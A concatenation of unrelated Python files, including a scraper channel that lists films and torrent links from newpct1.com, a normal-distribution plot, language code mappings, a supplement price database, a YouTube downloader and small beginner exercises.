data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
patron = '<li><a href="http://(?:www.)?newpct1.com/' + item.extra + '/">.*?<ul>(.*?)</ul>'
data = scrapertools.get_match(data, patron)
patron = '<a href="([^"]+)".*?>([^>]+)</a>'
matches = re.compile(patron, re.DOTALL).findall(data)
for scrapedurl, scrapedtitle in matches:
title = scrapedtitle.strip()
url = scrapedurl
itemlist.append(Item(channel=item.channel, action="listado", title=title, url=url, extra="pelilist"))
itemlist.append(
Item(channel=item.channel, action="alfabeto", title=title + " [A-Z]", url=url, extra="pelilist"))
return itemlist
def alfabeto(item):
logger.info()
itemlist = []
data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
patron = '<ul class="alfabeto">(.*?)</ul>'
data = scrapertools.get_match(data, patron)
patron = '<a href="([^"]+)"[^>]+>([^>]+)</a>'
matches = re.compile(patron, re.DOTALL).findall(data)
for scrapedurl, scrapedtitle in matches:
title = scrapedtitle.upper()
url = scrapedurl
itemlist.append(Item(channel=item.channel, action="listado", title=title, url=url, extra=item.extra))
return itemlist
def listado(item):
logger.info()
itemlist = []
url_next_page =''
data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
#logger.debug(data)
logger.debug('item.modo: %s'%item.modo)
logger.debug('item.extra: %s'%item.extra)
if item.modo != 'next' or item.modo =='':
logger.debug('item.title: %s'% item.title)
patron = '<ul class="' + item.extra + '">(.*?)</ul>'
logger.debug("patron=" + patron)
fichas = scrapertools.get_match(data, patron)
page_extra = item.extra
else:
fichas = data
page_extra = item.extra
patron = '<a href="([^"]+).*?' # la url
patron += 'title="([^"]+).*?' # el titulo
patron += '<img src="([^"]+)"[^>]+>.*?' # el thumbnail
patron += '<span>([^<].*?)<' # la calidad
matches = re.compile(patron, re.DOTALL).findall(fichas)
logger.debug('item.next_page: %s'%item.next_page)
# Paginacion
if item.next_page != 'b':
if len(matches) > 30:
url_next_page = item.url
matches = matches[:30]
next_page = 'b'
modo = 'continue'
else:
matches = matches[30:]
next_page = 'a'
patron_next_page = '<a href="([^"]+)">Next<\/a>'
matches_next_page = re.compile(patron_next_page, re.DOTALL).findall(data)
modo = 'continue'
if len(matches_next_page) > 0:
url_next_page = matches_next_page[0]
modo = 'next'
for scrapedurl, scrapedtitle, scrapedthumbnail, calidad in matches:
url = scrapedurl
title = scrapedtitle
thumbnail = scrapedthumbnail
action = "findvideos"
extra = ""
year = scrapertools.find_single_match(scrapedthumbnail, r'-(\d{4})')
if "1.com/series" in url:
action = "episodios"
extra = "serie"
title = scrapertools.find_single_match(title, '([^-]+)')
title = title.replace("Ver online", "", 1).replace("Descarga Serie HD", "", 1).replace("Ver en linea", "",
1).strip()
else:
title = title.replace("Descargar", "", 1).strip()
if title.endswith("gratis"): title = title[:-7]
show = title
if item.extra != "buscar-list":
title = title + ' ' + calidad
context = ""
context_title = scrapertools.find_single_match(url, "http://(?:www.)?newpct1.com/(.*?)/(.*?)/")
if context_title:
try:
context = context_title[0].replace("descargar-", "").replace("pelicula", "movie").replace("series",
"tvshow")
context_title = context_title[1].replace("-", " ")
if re.search('\d{4}', context_title[-4:]):
context_title = context_title[:-4]
elif re.search('\(\d{4}\)', context_title[-6:]):
context_title = context_title[:-6]
except:
context_title = show
logger.debug('contxt title: %s'%context_title)
logger.debug('year: %s' % year)
logger.debug('context: %s' % context)
if not 'array' in title:
itemlist.append(Item(channel=item.channel, action=action, title=title, url=url, thumbnail=thumbnail,
extra = extra,
show = context_title, contentTitle=context_title, contentType=context,
context=["buscar_trailer"], infoLabels= {'year':year}))
tmdb.set_infoLabels(itemlist, True)
if url_next_page:
itemlist.append(Item(channel=item.channel, action="listado", title=">> Página siguiente",
url=url_next_page, next_page=next_page, folder=True,
text_color='yellow', text_bold=True, modo = modo, plot = extra,
extra = page_extra))
return itemlist
def listado2(item):
logger.info()
itemlist = []
data = re.sub(r"\n|\r|\t|\s{2,}", "", httptools.downloadpage(item.url, post=item.post).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
list_chars = [["ñ", "ñ"]]
for el in list_chars:
data = re.sub(r"%s" % el[0], el[1], data)
try:
get, post = scrapertools.find_single_match(data, '<ul class="pagination">.*?<a class="current" href.*?'
'<a\s*href="([^"]+)"(?:\s*onClick=".*?\'([^"]+)\'.*?")')
except:
post = False
if post:
if "pg" in item.post:
item.post = re.sub(r"pg=(\d+)", "pg=%s" % post, item.post)
else:
item.post += "&pg=%s" % post
pattern = '<ul class="%s">(.*?)</ul>' % item.pattern
data = scrapertools.get_match(data, pattern)
pattern = '<li><a href="(?P<url>[^"]+)".*?<img src="(?P<img>[^"]+)"[^>]+>.*?<h2.*?>\s*(?P<title>.*?)\s*</h2>'
matches = re.compile(pattern, re.DOTALL).findall(data)
for url, thumb, title in matches:
# fix encoding for title
real_title = scrapertools.find_single_match(title, r'font color.*?font.*?><b>(.*?)<\/b><\/font>')
title = scrapertools.htmlclean(title)
title = title.replace("�", "ñ")
# no mostramos lo que no sean videos
if "/juego/" in url or "/varios/" in url:
continue
if ".com/series" in url:
show = real_title
itemlist.append(Item(channel=item.channel, action="episodios", title=title, url=url, thumbnail=thumb,
context=["buscar_trailer"], contentSerieName=show))
else:
itemlist.append(Item(channel=item.channel, action="findvideos", title=title, url=url, thumbnail=thumb,
context=["buscar_trailer"]))
if post:
itemlist.append(item.clone(channel=item.channel, action="listado2", title=">> Página siguiente",
thumbnail=get_thumb("next.png")))
return itemlist
def findvideos(item):
logger.info()
itemlist = []
## Cualquiera de las tres opciones son válidas
# item.url = item.url.replace("1.com/","1.com/ver-online/")
# item.url = item.url.replace("1.com/","1.com/descarga-directa/")
item.url = item.url.replace("1.com/", "1.com/descarga-torrent/")
# Descarga la página
data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
title = scrapertools.find_single_match(data, "<h1><strong>([^<]+)</strong>[^<]+</h1>")
title += scrapertools.find_single_match(data, "<h1><strong>[^<]+</strong>([^<]+)</h1>")
caratula = scrapertools.find_single_match(data, '<div class="entry-left">.*?src="([^"]+)"')
# <a href="http://tumejorjuego.com/download/index.php?link=descargar-torrent/058310_yo-frankenstein-blurayrip-ac3-51.html" title="Descargar torrent de Yo Frankenstein " class="btn-torrent" target="_blank">Descarga tu Archivo torrent!</a>
patron = 'openTorrent.*?"title=".*?" class="btn-torrent">.*?function openTorrent.*?href = "(.*?)";'
# escraped torrent
url = scrapertools.find_single_match(data, patron)
if url != "":
itemlist.append(
Item(channel=item.channel, action="play", server="torrent", title=title + " [torrent]", fulltitle=title,
url=url, thumbnail=caratula, plot=item.plot, folder=False))
logger.debug("matar %s" % data)
# escraped ver vídeos, descargar vídeos un link, múltiples liks
data = data.replace("'", '"')
data = data.replace(
'javascript:;" onClick="popup("http://www.newpct1.com/pct1/library/include/ajax/get_modallinks.php?links=', "")
data = data.replace("http://tumejorserie.com/descargar/url_encript.php?link=", "")
data = data.replace("$!", "#!")
patron_descargar = '<div id="tab2"[^>]+>.*?</ul>'
patron_ver = '<div id="tab3"[^>]+>.*?</ul>'
match_ver = scrapertools.find_single_match(data, patron_ver)
match_descargar = scrapertools.find_single_match(data, patron_descargar)
patron = '<div class="box1"><img src="([^"]+)".*?' # logo
patron += '<div class="box2">([^<]+)</div>' # servidor
patron += '<div class="box3">([^<]+)</div>' # idioma
patron += '<div class="box4">([^<]+)</div>' # calidad
patron += '<div class="box5"><a href="([^"]+)".*?' # enlace
patron += '<div class="box6">([^<]+)</div>' # titulo
enlaces_ver = re.compile(patron, re.DOTALL).findall(match_ver)
enlaces_descargar = re.compile(patron, re.DOTALL).findall(match_descargar)
for logo, servidor, idioma, calidad, enlace, titulo in enlaces_ver:
servidor = servidor.replace("streamin", "streaminto")
titulo = titulo + " [" + servidor + "]"
mostrar_server = True
if config.get_setting("hidepremium"):
mostrar_server = servertools.is_server_enabled(servidor)
if mostrar_server:
try:
devuelve = servertools.findvideosbyserver(enlace, servidor)
if devuelve:
enlace = devuelve[0][1]
itemlist.append(
Item(fanart=item.fanart, channel=item.channel, action="play", server=servidor, title=titulo,
fulltitle=item.title, url=enlace, thumbnail=logo, plot=item.plot, folder=False))
except:
pass
for logo, servidor, idioma, calidad, enlace, titulo in enlaces_descargar:
servidor = servidor.replace("uploaded", "uploadedto")
partes = enlace.split(" ")
p = 1
for enlace in partes:
parte_titulo = titulo + " (%s/%s)" % (p, len(partes)) + " [" + servidor + "]"
p += 1
mostrar_server = True
if config.get_setting("hidepremium"):
mostrar_server = servertools.is_server_enabled(servidor)
if mostrar_server:
try:
devuelve = servertools.findvideosbyserver(enlace, servidor)
if devuelve:
enlace = devuelve[0][1]
itemlist.append(Item(fanart=item.fanart, channel=item.channel, action="play", server=servidor,
title=parte_titulo, fulltitle=item.title, url=enlace, thumbnail=logo,
plot=item.plot, folder=False))
except:
pass
return itemlist
def episodios(item):
logger.info()
itemlist = []
infoLabels = item.infoLabels
data = re.sub(r"\n|\r|\t|\s{2,}", "", httptools.downloadpage(item.url).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
pattern = '<ul class="%s">(.*?)</ul>' % "pagination" # item.pattern
pagination = scrapertools.find_single_match(data, pattern)
if pagination:
pattern = '<li><a href="([^"]+)">Last<\/a>'
full_url = scrapertools.find_single_match(pagination, pattern)
url, last_page = scrapertools.find_single_match(full_url, r'(.*?\/pg\/)(\d+)')
list_pages = [item.url]
for x in range(2, int(last_page) + 1):
response = httptools.downloadpage('%s%s'% (url,x))
if response.sucess:
list_pages.append("%s%s" % (url, x))
else:
list_pages = [item.url]
for index, page in enumerate(list_pages):
logger.debug("Loading page %s/%s url=%s" % (index, len(list_pages), page))
data = re.sub(r"\n|\r|\t|\s{2,}", "", httptools.downloadpage(page).data)
data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
pattern = '<ul class="%s">(.*?)</ul>' % "buscar-list" # item.pattern
data = scrapertools.get_match(data, pattern)
pattern = '<li[^>]*><a href="(?P<url>[^"]+).*?<img src="(?P<thumb>[^"]+)".*?<h2[^>]+>(?P<info>.*?)</h2>'
matches = re.compile(pattern, re.DOTALL).findall(data)
for url, thumb, info in matches:
if "<span" in info: # new style
pattern = ".*?[^>]+>.*?Temporada\s*(?P<season>\d+)\s*Capitulo(?:s)?\s*(?P<episode>\d+)" \
"(?:.*?(?P<episode2>\d+)?)<.+?<span[^>]+>(?P<lang>.*?)</span>\s*Calidad\s*<span[^>]+>" \
"[\[]\s*(?P<quality>.*?)\s*[\]]</span>"
r = re.compile(pattern)
match = [m.groupdict() for m in r.finditer(info)][0]
if match["episode2"]:
multi = True
title = "%s (%sx%s-%s) [%s][%s]" % (item.show, match["season"], str(match["episode"]).zfill(2),
str(match["episode2"]).zfill(2), match["lang"],
match["quality"])
else:
multi = False
title = "%s (%sx%s) [%s][%s]" % (item.show, match["season"], str(match["episode"]).zfill(2),
match["lang"], match["quality"])
else: # old style
pattern = "\[(?P<quality>.*?)\].*?\[Cap.(?P<season>\d+)(?P<episode>\d{2})(?:_(?P<season2>\d+)" \
"(?P<episode2>\d{2}))?.*?\].*?(?:\[(?P<lang>.*?)\])?"
r = re.compile(pattern)
match = [m.groupdict() for m in r.finditer(info)][0]
# logger.debug("data %s" % match)
str_lang = ""
if match["lang"] is not None:
str_lang = "[%s]" % match["lang"]
if match["season2"] and match["episode2"]:
multi = True
if match["season"] == match["season2"]:
title = "%s (%sx%s-%s) %s[%s]" % (item.show, match["season"], match["episode"],
match["episode2"], str_lang, match["quality"])
else:
title = "%s (%sx%s-%sx%s) %s[%s]" % (item.show, match["season"], match["episode"],
match["season2"], match["episode2"], str_lang,
match["quality"])
else:
title = "%s (%sx%s) %s[%s]" % (item.show, match["season"], match["episode"], str_lang,
match["quality"])
multi = False
season = match['season']
episode = match['episode']
itemlist.append(Item(channel=item.channel, action="findvideos", title=title, url=url, thumbnail=thumb,
quality=item.quality, multi=multi, contentSeason=season,
contentEpisodeNumber=episode, infoLabels = infoLabels))
# order list
tmdb.set_infoLabels_itemlist(itemlist, seekTmdb = True)
if len(itemlist) > 1:
itemlist = sorted(itemlist, key=lambda it: (int(it.contentSeason), int(it.contentEpisodeNumber)))
if config.get_videolibrary_support() and len(itemlist) > 0:
itemlist.append(
item.clone(title="Añadir esta serie a la videoteca", action="add_serie_to_library", extra="episodios"))
return itemlist
def search(item, texto):
logger.info("search:" + texto)
# texto = texto.replace(" ", "+")
try:
item.post = "q=%s" % texto
item.pattern = "buscar-list"
itemlist = listado2(item)
return itemlist
# Se captura la excepción, para no interrumpir al buscador global si un canal falla
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def newest(categoria):
logger.info()
itemlist = []
item = Item()
try:
item.extra = 'pelilist'
if categoria == 'torrent':
item.url = host+'peliculas/'
itemlist = listado(item)
if itemlist[-1].title == ">> Página siguiente":
itemlist.pop()
item.url = host+'series/'
itemlist.extend(listado(item))
if itemlist[-1].title == ">> Página siguiente":
itemlist.pop()
# Se captura la excepción, para no interrumpir al canal novedades si un canal falla
except:
import sys
for line in sys.exc_info():
logger.error("{0}".format(line))
return []
return itemlist
|
983,793 | 04dcf4ea8576d1b6251e1a8db94ba168c3fa7e9b | import math
import pandas as pd # 导入另一个包“pandas” 命名为 pd,理解成pandas是在 numpy 基础上的升级包
import numpy as np #导入一个数据分析用的包“numpy” 命名为 np
import matplotlib.pyplot as plt # 导入 matplotlib 命名为 plt,类似 matlab,集成了许多可视化命令
#jupyter 的魔术关键字(magic keywords)
#在文档中显示 matplotlib 包生成的图形
# 设置图形的风格
#%matplotlib inline
#%config InlineBackend.figure_format = 'retina'
from pandas import DataFrame
data=[148.51,146.65,148.52,150.70,150.42]
time =DataFrame(data)
time.columns = ['a']
print(time)
#time.rename(index=str, columns={"0": "a"},inplace=True)
#mean均值,是正态分布的中心,把 数据集中的均值 定义为 mean
mean = time.mean()
mean=mean[0]
#S.D.标准差,把数据集中的标准差 定义为 std
std = time.std()
#std=std[0]
std=math.sqrt(0.2)
#正态分布的概率密度函数。可以理解成 x 是 mu(均值)和 sigma(标准差)的函数
def normfun(x,mu,sigma):
pdf = np.exp(-((x - mu)**2)/(2*sigma**2)) / (sigma * np.sqrt(2*np.pi))
return pdf
# 设定 x 轴前两个数字是 X 轴的开始和结束,第三个数字表示步长,或者区间的间隔长度
x = np.arange(142,157,0.1)
#设定 y 轴,载入刚才的正态分布函数
y = normfun(x, mean, std)
#画出直方图,最后的“normed”参数,是赋范的意思,数学概念
#plt.hist(time, bins=10, rwidth=0.9, normed=True)
#plt2=plt.twinx()
plt.plot(x,y)
plt.title('Time distribution')
plt.xlabel('Time')
plt.ylabel('Probability')
#输出
plt.show() |
983,794 | 1d7adb806f02e1d6937fe38f56261c3f43d46894 | #!/usr/bin/env python3
#coding: utf-8
# all UD 1.4 langs
short2long = {
"ar": "ara",
"bg": "bul",
"ca": "cat",
"cop": "cop", # no W2C, no Opus
"cs": "ces",
"cu": "chu", # no W2C, no Opus
"da": "dan",
"de": "deu",
"el": "ell",
"en": "eng",
"es": "spa",
"et": "est",
"eu": "eus",
"fa": "fas",
"fi": "fin",
"fr": "fra",
"ga": "gle", # in Opus: leccos ale ne OpenSubtitles
"gl": "glg",
"got": "got", # no W2C, no Opus
"grc": "grc", # no W2C, in Opus: Ubuntu
"he": "heb",
"hi": "hin",
"hr": "hrv",
"hu": "hun",
"id": "ind",
"it": "ita",
"ja": "jpn", # no Delta
"kk": "kaz",
"la": "lat", # in Opus: Ubuntu Gnome Tatoeba
"lv": "lav",
"nl": "nld",
"no": "nor",
"pl": "pol",
"pt": "por",
"ro": "ron",
"ru": "rus",
"sa": "san", # no W2C, in Opus: Ubuntu
"sk": "slk",
"sl": "slv",
"sv": "swe",
"swl": "swl", # no W2C, no Opus
"ta": "tam",
"tr": "tur",
"ug": "uig", # no W2C, in Opus: Ubuntu Gnome Tanzil
"uk": "ukr",
"vi": "vie",
"zh": "zho", # no Delta
}
long2short = dict()
for s, l in short2long.items():
long2short[l] = s
import sys
iso_in = sys.argv[1]
if len(iso_in) == 3:
print(long2short[iso_in])
else:
print(short2long[iso_in])
|
983,795 | 46c7f1d46a92a38054a36220ed84a4501b963007 | from diethack import makeProduct, makeProductUnits, makeElements, \
fetchNndb, makeConverter
from random import shuffle
def products():
return _chickenBreast() + \
_soyProteinSprouts() + \
_soybeanOil() + \
_codLiverOil() + \
_barley() + \
_brownRiceShort() + \
_whiteRiceLong() + \
_wheatBran() + \
_sugar() + \
_tableSalt() + \
_distilledWater() + \
microSupplements()
def microSupplements():
return _tableSalt() + \
_optiMen() + \
_cholineTablets() + \
_chromiumTablets() + \
_iodineTablets() + \
_biotinTablets() + \
_molybdenumTablets() + \
_potassiumPowder() + \
_potassiumTablets() + \
_floricalTablets() + \
_calciumTablets() + \
_magnesiumTablets() + \
_ironTablets() + \
_vitaminCTablets() + \
_vitaminKTablets() + \
_zincTablets() + \
_riboflavinTablets() + \
_vitaminB12Tablets() + \
_vitaminB6Tablets() + \
_copperTablets() + \
_vitaminETablets() + \
_seleniumTablets() + \
_vitaminDTablets()
def _convert(**kwargs):
return makeConverter().convertDict(kwargs, makeProductUnits())
def _fetchNndb(code):
return makeConverter().convertDict(fetchNndb(code), makeProductUnits())
def _soyProteinSprouts():
return [makeProduct(**dict(
_fetchNndb('16122').items() + {
'name': 'soy protein isolate bulk "sprouts"',
'nameShort': 'soy protein',
'price': 699,
'priceMass': 453}.items()))]
def _chickenBreast():
return [makeProduct(**dict(
_fetchNndb('05062').items() + {
'name': 'boneless skinless chicken breasts "sprouts"',
'nameShort': 'chicken breasts',
'price': 199, # weekly special
'priceMass': 453}.items()))]
def _soybeanOil():
oilDensK = 0.922
return [makeProduct(**dict(
_fetchNndb('04044').items() + {
'name': 'soybean oil "carlini" (aldi)',
'nameShort': 'soybean oil',
'price': 629,
'priceMass': 8.0*453.0*oilDensK}.items()))]
def _codLiverOil():
return [makeProduct(**dict(
_fetchNndb('04589').items() + {
'name': 'cod liver oil "twinlab"',
'nameShort': 'cod liver oil',
'dataUrl': 'http://www.vitacost.com/twinlab-norwegian-cod-liver-oil-unflavored-12-fl-oz',
'price': 897,
'priceMass': 355}.items()))]
def _brownRiceShort():
return [makeProduct(**dict(
_fetchNndb('20040').items() + {
'name': 'brown rice short-grain bulk "sprouts"',
'nameShort': 'brown rice',
'price': 99,
'priceMass': 453}.items()))]
def _whiteRiceLong():
return [makeProduct(**dict(
_fetchNndb('20044').items() + {
'name': 'white rice long-grain bulk "sprouts"',
'nameShort': 'white rice',
'price': 99,
'priceMass': 453}.items()))]
def _barley():
return [makeProduct(**dict(
_fetchNndb('20005').items() + {
'name': 'pearl barley bulk "sprouts"',
'nameShort': 'barley',
'price': 99,
'priceMass': 453}.items()))]
def _sugar():
return [makeProduct(**dict(
_fetchNndb('19336').items() + {
'name': 'granulated sugar "baker\'s corner" (aldi)',
'nameShort': 'sugar',
'price': 149,
'priceMass': 4*453}.items()))]
def _wheatBran():
return [makeProduct(**dict(
_fetchNndb('20077').items() + {
'name': 'wheat bran "bob\'s red mill"',
'nameShort': 'wheat bran',
'dataUrl': 'http://www.amazon.com/gp/product/B004VLVIL4',
'price': 965,
'priceMass': 2268}.items()))]
def _tableSalt():
return [makeProduct(**dict(
_fetchNndb('02047').items() + {
'name': 'table salt "morton"',
'nameShort': 'salt',
'price': 97,
'priceMass': 1800}.items()))]
def _optiMen():
# source: package
return [makeProduct(
name = 'vitamins opti-men "optimum nutrition"',
price = 2149,
priceMass = 180,
**_convert(
elementsMass = (3, 'g'), # 3 tablets
elements = makeElements(
calcium = (200, 'mg'),
vitaminA = (10000, 'IU_vitaminA_betacarotine_sup'),
vitaminC = (300, 'mg'),
vitaminD = (300, 'IU_vitaminD'),
vitaminE = (200, 'IU_vitaminE_d_alphatocopherol'),
vitaminESup = (200, 'IU_vitaminE_d_alphatocopherol'),
vitaminK = (75, 'mcg'),
thiamin = (75, 'mg'),
riboflavin = (75, 'mg'),
niacin = (75, 'mg'),
niacinSup = (75, 'mg'),
vitaminB6 = (50, 'mg'),
folate = (600, 'mcg_folicAcid'),
folateSup = (600, 'mcg_folicAcid'),
vitaminB12 = (100, 'mcg'),
pantothenicAcid = (75, 'mg'),
biotin = (300, 'mcg'),
choline = (10, 'mg'),
chromium = (120, 'mcg'),
copper = (2, 'mg'),
iodine = (150, 'mcg'),
magnesium = (100, 'mg'),
magnesiumSup = (100, 'mg'),
manganese = (5, 'mg'),
molybdenum = (80, 'mcg'),
selenium = (200, 'mcg'),
zinc = (30, 'mg'),
boron = (2, 'mg'),
silicon = (5, 'mg'),
vanadium = (100, 'mcg')
)))]
def _distilledWater():
return [makeProduct(
name = 'distilled water',
nameShort = 'water',
price = 0,
priceMass = 100,
**_convert(
elementsMass = (100, 'g'),
elements = makeElements(
water = (100, 'g')
)))]
def _cholineTablets():
# source: online shop
return [makeProduct(
name = 'choline tablets "nature\'s way"',
nameShort = 'choline',
dataUrl = 'http://www.vitacost.com/natures-way-choline',
price = 639,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
choline = (500, 'mg')
)))]
def _chromiumTablets():
# source: online shop
return [makeProduct(
name = 'chromium picolinate tablets "vitacost"',
nameShort = 'Cr',
dataUrl = 'http://www.vitacost.com/vitacost-chromium-picolinate',
price = 939,
priceMass = 300, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
chromium = (200, 'mcg')
)))]
def _iodineTablets():
# source: online shop
return [makeProduct(
name = 'kelp tablets "nature\'s way"',
nameShort = 'I',
dataUrl = 'http://www.vitacost.com/natures-way-kelp',
price = 569,
priceMass = 180, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
iodine = (400, 'mcg')
)))]
def _biotinTablets():
# source: online shop
return [makeProduct(
name = 'biotin "source naturals"',
nameShort = 'biotin',
dataUrl = 'http://www.vitacost.com/source-naturals-biotin-600-mcg-200-tablets',
price = 709,
priceMass = 200, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
biotin = (600, 'mcg')
)))]
def _molybdenumTablets():
# source: online shop
return [makeProduct(
name = 'molybdenum tablets "kal"',
nameShort = 'Mo',
dataUrl = 'http://www.vitacost.com/kal-molybdenum-chelated-250-mcg-100-microtablets',
price = 499,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
molybdenum = (250, 'mcg')
)))]
def _potassiumPowder():
# source: http://www.iherb.com/Now-Foods-Potassium-Chloride-Powder-8-oz-227-g/777
return [makeProduct(
name = 'potassium chloride powder "bulk supplements"',
nameShort = 'K',
dataUrl = 'http://www.amazon.com/BulkSupplements-Potassium-Chloride-Powder-grams/dp/B00ENS39WG',
price = 1996,
**_convert(
priceMass = (1000, 'g'),
elementsMass = (1.4, 'g'),
elements = makeElements(
potassium = (730, 'mg')
)))]
def _potassiumTablets():
# source: online shop
return [makeProduct(
name = 'potassium citrate "vitacost"',
nameShort = 'K2',
dataUrl = 'http://www.vitacost.com/vitacost-potassium-citrate',
price = 699,
priceMass = 300, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
potassium = (99, 'mg')
)))]
def _floricalTablets():
# source: online shop
return [makeProduct(
name = 'florical tablets "mericon"',
nameShort = 'F',
dataUrl = 'http://www.amazon.com/Florical-Calcium-Fluoride-supplements-Industries/dp/B000M4C5TS',
price = 1359,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
calcium = (145, 'mg'),
fluoride = (3.75, 'mg')
)))]
def _calciumTablets():
res = []
# source: online shop
res += [makeProduct(
name = 'calcium dietary supplement "caltrate"',
nameShort = 'Ca1',
price = 1493,
priceMass = 150, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
calcium = (600, 'mg')
)))]
# source: online shop
res += [makeProduct(
name = 'ultra calcium with vitamin d3 "vitacost"',
nameShort = 'Ca2',
dataUrl = 'http://www.vitacost.com/vitacost-ultra-calcium-1200-mg-with-vitamin-d3-700-iu-per-serving-300-softgels-7',
price = 1149,
priceMass = 150, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
energy = (10, 'kcal'),
fat = (1, 'g'),
calcium = (1200, 'mg')
)))]
return res
def _magnesiumTablets():
# source: online shop
return [makeProduct(
name = 'magnesium tablets "vitacost"',
nameShort = 'Mg',
dataUrl = 'http://www.vitacost.com/vitacost-magnesium-400-mg-200-capsules-1',
price = 649,
priceMass = 200, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
magnesium = (400, 'mg'),
magnesiumSup = (400, 'mg')
)))]
def _ironTablets():
# source: online shop
return [makeProduct(
name = 'iron tablets "nature made"',
price = 674,
priceMass = 180, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
iron = (65, 'mg')
)))]
def _vitaminCTablets():
# source: online shop
return [makeProduct(
name = 'vitamin c tablets "vitacost"',
nameShort = 'vit c',
dataUrl = 'http://www.vitacost.com/vitacost-vitamin-c-1000-mg-250-capsules',
price = 1176,
priceMass = 250, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
vitaminC = (1000, 'mg')
)))]
def _vitaminKTablets():
# source: online shop
return [makeProduct(
name = 'vitamin k tablets "vitacost"',
nameShort = 'vit k',
dataUrl = 'http://www.vitacost.com/vitacost-vitamin-k-complex-with-k1-k2-400-mcg-180-softgels',
price = 2499,
priceMass = 180, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
vitaminK = (400, 'mcg'),
vitaminC = (10, 'mg')
)))]
def _zincTablets():
# source: online shop
return [makeProduct(
name = 'zinc tablets "vitacost"',
nameShort = 'Zn',
dataUrl = 'http://www.vitacost.com/vitacost-l-optizinc',
price = 899,
priceMass = 200, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
zinc = (30, 'mg')
)))]
def _riboflavinTablets():
# source: online shop
return [makeProduct(
name = 'vitamin b-2 "solgar"',
nameShort = 'vit b2',
dataUrl = 'http://www.vitacost.com/solgar-vitamin-b2-riboflavin-50-mg-100-tablets',
price = 719,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
riboflavin = (50, 'mg')
)))]
def _vitaminB12Tablets():
# source: online shop
return [makeProduct(
name = 'vitamin b-12 tablets "solgar"',
nameShort = 'vit b12',
dataUrl = 'http://www.vitacost.com/solgar-vitamin-b12-100-mcg-100-tablets',
price = 559,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
vitaminB12 = (100, 'mcg')
)))]
def _vitaminB6Tablets():
# source: online shop
return [makeProduct(
name = 'vitamin b-6 "nature\'s way"',
price = 639,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
carb = (1, 'g'),
vitaminB6 = (100, 'mg')
)))]
def _copperTablets():
# source: online shop
return [makeProduct(
name = 'copper tablets "twinlab"',
price = 621,
priceMass = 100, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
copper = (2, 'mg')
)))]
def _vitaminETablets():
# source: online shop
return [makeProduct(
name = 'vitamin e "vitacost"',
nameShort = 'vit e',
dataUrl = 'http://www.vitacost.com/vitacost-gamma-e-tocopherol-complex-200-iu-60-softgels',
price = 899,
priceMass = 60, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
vitaminE = (200, 'IU_vitaminE_d_alphatocopherol'),
vitaminESup = (200, 'IU_vitaminE_d_alphatocopherol')
)))]
def _seleniumTablets():
# source: online shop
return [makeProduct(
name = 'hypo-selenium tablets "douglas laboratories"',
price = 1160,
priceMass = 90, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
selenium = (200, 'mcg')
)))]
def _vitaminDTablets():
# source: online shop
return [makeProduct(
name = 'vitamin d "vitacost"',
nameShort = 'vit d',
dataUrl = 'http://www.vitacost.com/vitacost-vitamin-d3-as-cholecalciferol-1000-iu-200-capsules-1',
price = 599,
priceMass = 200, # tablets
elementsMass = 1,
**_convert(
elements = makeElements(
vitaminD = (1000, 'IU_vitaminD')
)))]
|
983,796 | 92ce220e1c8560ef2ba7a0dd7bfb90d5f6555ada | from abc import ABCMeta, abstractmethod
class Vehicle(object):
""" A vehicle for sale """
__metaclass__ = ABCMeta
base_sale_price = 0
def sale_price(self):
if self.sold_on is None:
return 0.0
return 5000.0 * self.wheels
def purchase_price(self):
if self.sold_on is None:
return 0.0
return self.base_sale_price - (.10 * self.miles)
@abstractmethod #Now we can't create an instance of Vehicle
def vehicle_type():
"""return a string representing the type of vehicle this is """
pass
class Car(Vehicle):
base_sale_price = 8000
wheels = 4
def vehicle_type(self):
return 'car'
class Truck(Vehicle):
base_sale_price = 10000
wheels = 4
def vehicle_type(self):
return 'Truck'
v = Vehicle()
|
983,797 | a42820ec49fe9f19f2fb99284f448538f60a3f81 | from pytube import YouTube
filename="musicList.txt"
file=open(filename,"r")
for videoURL in file:
print(videoURL)
yt = YouTube(videoURL)
stream = yt.streams.first()
stream.download("./")
print('下載完成')
#print("輸入網址錯誤")
|
983,798 | 28b1e6d667c93b556719a9e71e8cb280d0b31eb2 | """
Faça um programa para ler as dimensões de um terreno(comprimento C e largura L),
bem como o preço do metro de tela P. Imprima o custo para cercar este mesmo
terreno com tela.
"""
comprimento = float(input("Comprimento(C): "))
largura = float(input("Largura: (L)"))
preco = float(input("Preço do metro de tela (P): "))
valor = comprimento * largura * preco
